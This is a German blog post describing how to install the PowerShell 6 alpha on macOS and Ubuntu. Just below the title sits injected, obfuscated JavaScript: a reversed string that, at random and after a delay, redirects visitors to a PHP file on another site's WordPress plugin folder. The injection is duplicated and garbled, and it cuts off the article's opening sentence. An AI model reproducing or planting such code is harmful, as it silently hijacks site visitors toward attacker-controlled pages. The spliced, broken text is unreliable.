Startseite / Highlights / PowerShell für Linux und Mac OS

PowerShell für Linux und Mac OS

$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelt es sich hierbei um eine Alphaversion, welche noch Fehler beinhaltet.

Dennoch ist sie bereits vollständig in das Betriebssystem integriert und versteht auch jede menge an Shell Befehlen.

Die Installation:

Die Installation ist im Grunde auf fast allen Plattformen und Distributionen einfach und problemfrei. Hier ein Beispiel für MacOS und Ubuntu.

 

MacOS:

Für die Installation unter Mac muss lediglich die passende Datei von https://github.com/PowerShell/PowerShell/releases/tag/v6.0.0-alpha.17 geladen werden und dann mit einem Doppelklick installiert werden.

Alternativ kann man dies natürlich auch über die Konsole erledigen:

sudo installer -pkg powershell-6.0.0-alpha.17.pkg -target /

Öffnen kann man die PowerShell indem Ihr in der Shell (macOS wie auch Linux) den Befehl „powershell“ eingebt.

Natürlich kann man die PowerShell – wie auch unter Windows – mit einigen Modulen erweitern.

Zuletzt aktualisiert am 31. Mai 2018 um 4:04 . Wir weisen darauf hin, dass sich hier angezeigte Preise inzwischen geändert haben können. Alle Angaben ohne Gewähr.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.

Search Engine Submission - AddMe